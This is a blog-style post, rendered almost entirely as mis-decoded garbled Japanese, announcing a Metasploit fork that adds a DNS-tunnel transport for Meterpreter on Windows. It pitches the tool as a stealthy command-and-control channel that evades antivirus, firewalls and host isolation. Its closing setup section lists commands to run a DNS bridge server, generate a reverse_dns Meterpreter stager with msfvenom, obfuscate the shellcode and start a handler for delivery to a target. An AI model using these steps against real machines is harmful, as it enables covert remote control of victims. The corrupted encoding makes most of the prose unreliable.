ã³ãã³ããµãŒããŒãšã®ç§å¯éä¿¡ãã£ãã«ãæŽçããããã®DNSãã³ãã«ã®ãããã¯-ïŒC2ãŸãã¯CïŒCïŒã¯æ°ãããã®ã§ã¯ãããŸããããé·å¹Žã«ããã£ãŠ1ã€ã®äºã«æ©ãŸãããŠããŸãã-ãã³ãã¹ã¿ãŒïŒããã«ãŒïŒã®èŠ³ç¹ããã®ãã«æ©èœã®ãœãªã¥ãŒã·ã§ã³ã®å®è£
ã¯ãããŸããã§ããïŒèªåã®ããã«ã«ã¹ã¿ã ã®ãã®ãæ°ããŸããïŒã IodineãDNSCat2ãªã©ã®ãµãŒãããŒãã£ãµãŒãã¹ã䜿çšããã«1ã€ã®ããã«ã§ãã€ããŒããããŠã³ããŒããããªã¢ãŒããšãŒãžã§ã³ãïŒããã€ã®æšéŠ¬ïŒãå¶åŸ¡ãã䟿å©ãªæ¹æ³ã¯ãããŸããã§ããããããã¯ãã·ã¹ãã å
ã®ç§å¯ã®æ»åšã®ããã«äœæããããå€ãã®ããŒã«ã«ãã€ãºãäœæããŸããïŒTCPããŒããéããç¬ç«ããŠã¢ã¯ãã£ããªæ¥ç¶ãéããŸããå¥ã®ããã»ã¹ã§ãã³ã°ã¢ããããããã¯ãã¹ãŠãfawnããšãã1ã€ã®åèªã§ç¹åŸŽä»ããããŸãã
1幎åãDEF CONã°ã«ãŒãDC7812ã®ãã¬ãŒã ã¯ãŒã¯å
ã§ãçŽç²ã«ã楜ãã¿ãšå©çãã®ããã«ããããŠã³ãã¥ããã£ã®ããã«ããã®åé¡ã解決ããMeterpreterãšãŒãžã§ã³ãã®Metasploitãã©ã³ã¹ããŒãã«éåžžã®DNSãã³ãã«ãäœæããŸããïŒãããŸã§ã¯MS Windowsã®ã¿ïŒã ã€ãŸããMeterpreterããã®ãã³ãã«ããã€ãã£ãã§äœ¿çšããããã§ãã æããã«ãããã¯ããŒãã¹ããŒãžã£ãŒïŒã·ã§ã«ã³ãŒãïŒã®äœæãæ瀺ããŠããããããã®åãã¡ãŒã¿ãŒããªã¿ãŒïŒãŸãã¯å¥ã®MSFãã€ããŒãïŒã¯ãå°ç¡ãã«ãããããã»ã¹ããåãDNSã«çŽæ¥ããŒããããŸãã ãããã£ãŠããã³ãã¹ã¿ãŒã«ââè¿œå æ©èœãè¿œå ããæšæºã®ãã€ãã£ããã©ã³ã¹ããŒããµããŒãããããŸãã ãŸããç§ãã¡ã¯éçºãå®äºããä»ã§ã¯èª°ã§ãããã䜿çšããããå°ãªããšããã¹ããããã§ããããšããç¥ããããŸãã ã«ããã®äžã§ãç§ãã¡ã®éçºã®èå³æ·±ãç¹åŸŽãšæ©èœã«ã€ããŠèªãããšãã§ããŸãïŒ11æã«ã¢ã¹ã¯ã¯ã§éå¬ãããZeroNightsã«ã³ãã¡ã¬ã³ã¹ã§è©±ããŸããïŒã
Meterpreterã¯ã
Metasploitãã¬ãŒã ã¯ãŒã¯ã§éåžžã«æåã§äººæ°ã®ãããªã¢ãŒãã³ã³ãããŒã«ãšãŒãžã§ã³ãã§ãã ãã®ãšãŒãžã§ã³ãã¯éåžžã«æè»ã§äŸ¿å©ã§ãå€æ°ã®ã¢ãžã¥ãŒã«ãšãã©ã°ã€ã³ãããã³ç¬èªã®ãã©ã°ã€ã³ãšã¢ãžã¥ãŒã«ãäœæã§ããAPIã¿ã€ããåããŠããŸãã ããããæ®å¿µãªããããã©ã³ã¹ããŒããªã©ã®æ©èœã¯ã³ã¢ãšã³ãžã³ã®äžéšã§ãããããã¯ããããã¢ãžã¥ãŒã«ãéããããšãã§ããªãããšãæå³ããŸãã çŸæç¹ã§ã¯ãMeterpreterã¯æ¬¡ã®ã¿ã€ãã®ãã©ã³ã¹ããŒãããããã¯ãŒã¯ãã¬ãã«ããµããŒãããŠããŸãã
- TCPããŒãã®ãã€ã³ã
- TCP / IPãä»ããéæ¥ç¶
- HTTPçµç±ã®éæ¥ç¶
èšèšãããã³ã³ããŒãã³ã
ããã¬ãªãªãŒã¹ãã®çŸåšã®ããŒãžã§ã³ã§ã¯ã次ã®ã³ã³ããŒãã³ãã«å®è£
ãããŠããWindows OSïŒx64ããã³x86ïŒã®ã¿ã®DNSãã©ã³ã¹ããŒãããµããŒãããŸããã
DNS MSFããªããžã¯ãã·ã¹ãã ã®äž»èŠãªã³ã³ããŒãã³ãã®1ã€ã§ãã å®éãããã¯DNSãµãŒãã¹ãšããŠæ©èœããPythonã¹ã¯ãªããã§ãããååã解決ããããŒã¿ãRRã¬ã³ãŒãã®åœ¢åŒã§ãšãŒãžã§ã³ãã«è¿ã圹å²ãæãããŸãã ãã®ã€ã³ã¿ãŒãã§ã€ã¹ã¯ãã·ã§ã«ã³ãŒããŸãã¯MeterpreterãšãŒãžã§ã³ãã®DNSãã³ãã«ãç·šæããããã®æ¬è³ªã§ãã åæã«ãã³ã³ãœãŒã«ã®MetasploitåŽããéåžžã®TCPçµç±ã§æ¥ç¶ããããã«ãåããµãŒãã¹ãéåžžã®TCPããŒããéããŸãã ãããã£ãŠããã³ã¿ã¹ã¿ãŒã¯ãMSFãã³ãã©ãŒãšã©ããããããDNSã§ã¢ã¯ã»ã¹å¯èœã«ããæ¹æ³ã«ã€ããŠèããå¿
èŠã¯ãããŸããã å
šäœã®ã¿ã¹ã¯ã¯ããã®ã¹ã¯ãªããããµãŒããŒïŒAWS Ec2ïŒã«ãããããããã®äžã«ç¬èªã®ãã¡ã€ã³ãäœæããNSã¬ã³ãŒããäœæãããã³ãã¹ã¿ãŒãæ©èœããå Žæãšæ¹æ³ããã¹ããŒã ãã¹ã济ã³ãªãããšã§ã-éåžžã«äŸ¿å©ã§ãïŒç§ã®å¥œã¿ïŒã ããã«ããã®ãœãªã¥ãŒã·ã§ã³ã«ãããè€æ°ã®ãã³ãã¹ã¿ãŒãåãDNSã§ãåæã«ç°ãªãè² è·ã§äœæ¥ã§ããŸãã çŸåšã®ããŒãžã§ã³ã¯ãæ倧26ã®åæéãã¡ãŒã¿ãŒãã¬ã¿ãŒã»ãã·ã§ã³ããµããŒãããŠããŸãã çŸæç¹ã§ã¯ãMSFèªäœã§Rubyã®DNSãµãŒãã¹ããã€ãã£ãã«ãµããŒãããŠããŸããããMetasploitã³ãã¥ããã£ïŒå
·äœçã«ã¯
RageLtMan ïŒã§æ¢ã«äœæ¥ãè¡ãããŠããŸãã
ãã³ãã«èªäœã¯ã
DNSKEY RRãš
AAAA RRã®2çš®é¡ã®RRã¬ã³ãŒãïŒãªãã·ã§ã³ïŒã§æ§æãããŠããŸãã ã€ãŸãããããã®å®è£
ã¯ãã¹ãŠãã·ã§ã«ã³ãŒããå«ããã¹ãŠã®ã³ã³ããŒãã³ãã§ã«ãããããŸãã
å®éã«ã¯ããã©ã³ã¹ããŒãã®äœæ¥ã¯æ¬¡ã®ããã«ãªããŸãïŒMSFãã³ãã©ãŒïŒpentesterïŒã¯ãµãŒãã¹ã«æ¥ç¶ãããã€ããŒãïŒããšãã°ãã¡ãŒã¿ãŒãã¬ã¿ãŒæ¬äœïŒãDNSã«éä¿¡ããŠåŸ
æ©ããŸã...ãã®åŸãæ¡ä»¶ä»ãã§ããšã¯ã¹ããã€ããšã·ã§ã«ã³ãŒããã©ããã§æ©èœããDNSãã³ãã«ã䜿çšããŸãã meterpreterãããŠã³ããŒãããåãããã»ã¹ã®ã³ã³ããã¹ãã§èµ·åããŸããmeterpreterèªäœã¯ãåããã©ã³ã¹ããŒããšDNSã䜿çšããŠãMSFãã³ãã©ãŒïŒpentesterïŒãšã®äºééä¿¡ãç·šæããŸãã ãã®åŸãpentesterã¯äœã§ãã§ããŸã-å¥ã®ããã»ã¹ãžã®ç§»è¡ãã€ã³ã¿ã©ã¯ãã£ããªã³ãã³ãã·ã§ã«ã®ãªãŒãã³ãmimikatzã®äœ¿çšãªã©-ãããã¯ãã¹ãŠãã³ãã«ã«ãã£ãŠé ãããŸãã killchainã¹ããŒãžå
šäœïŒæäœåŸïŒã§ãåããã©ã³ã¹ããŒãã䜿çšããŸããè¿œå ã®ãã€ããªDNScat2ãã¡ã€ã«ãã¿ãŒã²ãããã·ã³ã«ã¢ããããŒãããããPowershellãå®è¡ãããããå¿
èŠã¯ãããŸããããã³ãã«ã®æåããé ãããŠããŸãã ããã«ããã³ããªã³ã°TCP / IPèªäœïŒããããŒïŒã®ãªãŒããŒãããã¯ãªããTLV meterpreterãã±ãããšããŒã¿ã®ã¿ããããŸãã
ãã³ãã«ã®æ§æã«ã€ããŠãã·ã§ã«ã³ãŒããšã¡ãŒã¿ãŒããªã¿ãŒããããã€ãã®èšèãè¿œå ããŸãã ããšãã°ãDNSCat2ãååãªãŸã«ããŒã®å®è£
èªäœã䜿çšããïŒã€ãŸããTCP / UDPæ¥ç¶ãå®è£
ããïŒå Žåã¯ãWindows APIïŒDnsQueryã䜿çšããŸããããã«ããããããã¯ãŒã¯æ¥ç¶ã®å®è£
ãMS DNSCacheã«ã·ããã§ããŸããã€ãŸãããããã¯ãŒã¯æ¥ç¶ãçŽæ¥å®è£
ãããŸããããã³ã°ãããããã»ã¹ãŸãã¯ããã¯ãã¢ïŒmeterpreterïŒã§ã¯ãªããsvchost.exeã ããã¯éåžžã«åªããæ©èœã§ããã被害è
ã®ã¯ãŒã¯ã¹ããŒã·ã§ã³ã§ã¢ã¯ãã£ãã«åäœããŠããEPP / AVããã³ããŒãœãã«ãã¡ã€ã¢ãŠã©ãŒã«ã«é¢ããå€ãã®åé¡ãåé¿ããæ°ããçãããæ¥ç¶ãç£èŠã§ããŸãã ããã¯æ¬¡ã®ããã«ãªããŸãã
æ¥ç¶ãèŠããªãã+ 5äžå¯èŠ8ïŒ
ãã³ãã«ã®å€å
žçãªããŒãã¯ãã©ã®ãããªå Žåã§ããæ¥ç¶ã¯ã€ã³ã¿ãŒãããã§ã¯ãªããããŒã«ã«DNSãµãŒããŒãã€ãŸãã«ãŒã¿ãŒãŸãã¯ãããã¯ãŒã¯ãã«ãã£ã³ã°ïŒADïŒã«ç»é²ããããã®ã«è¡ãããšã§ãã å®éãã€ã³ã¿ãŒãããã«çŽæ¥ã¢ã¯ã»ã¹ã§ããªããã·ã³ãå¶åŸ¡ããããšãã§ããŸãã ãããšã¯å¥ã«ãç§ã®çµéšã§ã¯ããã³ãã»ãããåŒãåºãããšãã®è©±ããã£ãããšãæãåºãããšãã§ããŸã-ãã€ããŒãã®ãã©ãããåããDNSãã³ãã«ã®ç¥å¥ªã«ãããé»åã¡ãŒã«ã§æçŽãéä¿¡ãããç¹ã«éé¢ããããšãªã¢ãã®ã¿ãŒã²ãããããã¬ã€ã¯ã¢ãŠããåä¿¡ããããšãã§ããŸããã ããã«ãæè¿ã1ã€ã®NextGen補åã®æ©èœããã¹ãããŸãã-ã䟵害ããããã¹ãã®åé¢ãããããŠDNSãã³ãã«ã䜿çšããã¡ãŒã¿ãã¬ã¿ãŒã¯ããã®åé¢ã¯äŸ¡å€ããªãããšãå€æããŸãã8ïŒèŠããã«ãå€ãã®ããŒãã¹ãšå©ç¹ããããŸããããã€ãã¹é¢ããããŸã-é床ãšãããã¯ãŒã¯ã®ç°åžžã é床ã«ã€ããŠ-ç°å¢ãšããŒã«ã«DNSã«å€§ããäŸåãã倧ããç°ãªãå ŽåããããŸãã ããŒã ãããã¯ãŒã¯ãšå»ºç©ã§æž¬å®ãè¡ããŸããã ãããã¯ãŒã¯ããã³ãããã¯çµæã§ãïŒ
ã¢ããããŒãããbase32-1 KB /ç§ãã4 KB /ç§
ããŠã³ãªã³ã¯AAAA -4 KB /ç§ãã16 KB /ç§
DNSKEY -86 KB /ç§ãã660 KB /ç§
ã芧ã®ãšãããDNSKEYãã³ãã«ã䜿çšãããšéåžžã«é«éã«ãªããŸãã ã·ã§ã«ã³ãŒãã¯ã2ç§ã§åå²ããç¬éã«äœããã³ãã³ã°ããŸããããã¯ç§ã®å¥œã¿ã«ã¯éåžžã«èš±å®¹ã§ããŸãã ããã«ãããããããäžè¬çã«æµ
ã誀åäœãšã¹ã¿ã³ãããããŸãïŒçµéšããïŒã AAAAãã³ãã«ã¯ãäžæ¹ã§ã¯ããèŠãã«ãã=ããå€ãã®æçåããããªã¯ãšã¹ãã§ãããAAAAãªã¯ãšã¹ãèªäœã¯ãã°ã§ã¯çãããããŸããã
ããŠããŒ
- git clone and budle install github.com/defcon-russia/metasploit-framework
- èŠããã«ãmsf.wsã®ãããªãã¡ã€ã³ãå¿
èŠã§ãã
- éçIPïŒããšãã°IP 1.2.3.4ïŒã§ãã¹ãããå Žæãå¿
èŠ
- NSã¬ã³ãŒããmsf.wsãšIPã«èšå®ããŸã
- ãµãŒããŒã§DNS MSFããªããžãåããŠå®è¡ããŸã
./dns_server.py --ipaddr 1.2.3.4 --domain msf.ws
- ã¹ããŒãžã£ãŒãã€ããŒããæºåããïŒã·ã§ã«ã³ãŒãïŒ
./msfvenom -p windows / meterpreter / reverse_dns DOMAIN = msf.ws RHOST = 1.2.3.4
- ã·ã§ã«ã³ãŒããæ··ä¹±ãããŸã
- MSFãã³ãã©ãŒãå®è¡ãã
ãšã¯ã¹ããã€ã/ãã«ã/ãã³ãã©ãŒã䜿çš
ãã€ããŒããŠã£ã³ããŠã®èšå®/ meterpreter / reverse_dns
ãã¡ã€ã³msf.wsãèšå®ããŸã
RHOST 1.2.3.4ãèšå®ããŸã
èµ°ã
- ã¹ããªãããã¿ãŒã²ããã«é
ä¿¡ããã»ãã·ã§ã³ãåŸ
ã¡ãŸã
ä»åŸã®èšç»çŸåšè¡ãããŠããäž»ãªã¿ã¹ã¯ã¯ãã¡ã€ã³ã®MSFãã©ã³ãã«ããŒãžããããšã§ããã€ãŸãããã®ãã©ã³ã¹ããŒãããã©ãŒã¯ã ãã§ãªããMetasploitã®äžéšã«ããããšã§ãã ãã®ããã»ã¹ã¯ãã§ã«é²è¡äžã§ããã
RageLtManããã€ãã£ãDNSãã³ãã©ãŒã®äœæãå«ãäœæ¥ã®ãã®éšåãåŒãåããŠãããããšã«æè¬ããŸãã æ¥å¹Žã¯åãªãåå²ç¹ã§ã¯ãªãããããžã§ã¯ãã®äžéšã«ãªããšæããŸãã
ãã®ãã©ã³ã¹ããŒãããå
¬åŒã«ããããžã§ã¯ãã®äžéšã«ãªã£ãããããŸããŸãªæ©èœã«ã€ããŠèãå§ããããšãã§ããŸãã
- ã¹ããŒãžã£ãŒã®XORæå·å
- Powershell / VBSã¹ããŒãžã£ãŒ
- ä»ã®ãã©ãããã©ãŒã ãšOSã®ãµããŒã
- ããå€ãã®çš®é¡ã®DNSãã³ãã«ïŒTXTãNULLãªã©ã
ãã®ãããªãã®ã«åå ãããå Žåã¯ãç§ãã¡ã«æžããŠãã ããã
ãããã®å Žåã§ããIRCã§ãããã®ã¿ã¹ã¯ããã®ä»ã®èå³æ·±ãã¿ã¹ã¯ã«ã€ããŠãã€ã§ã話ãããšãã§ããŸãïŒfreenode.org #Metasploitã
ãã³ãã«ã® max3razaãš
RageLtManãèŠæ±ã
ãŸã ïŒã
æ
å ±ã»ãã¥ãªãã£ã®ãããã¯ããŸã£ããèå³æ·±ãå Žåã¯ãã°ã«ãŒãDC 7812ãã¬ã°ã©ã ãã£ãã
t.me/DCG7812ã§ã¯ãã°ã«ãŒãããŒãã£ã³ã°ããªã³ã©ã€ã³ã¹ããªãŒã ãéå¬ããããšããããŸãïŒã¢ã€ãã¢ãããå ŽåããŸãã¯ããã¢ãŒã·ã§ã³ã«åå ãããå ŽåïŒ-ããããïŒ
ãããžã§ã¯ããœãŒã¹ïŒæ©èœãåããMSFããã©ãŒã¯ïŒïŒ
https://github.com/defcon-russia/metasploit-frameworkhttps://github.com/defcon-russia/metasploit-payloadsZeroNightsã䜿çšããã¹ã©ã€ãããã¢ãããªïŒ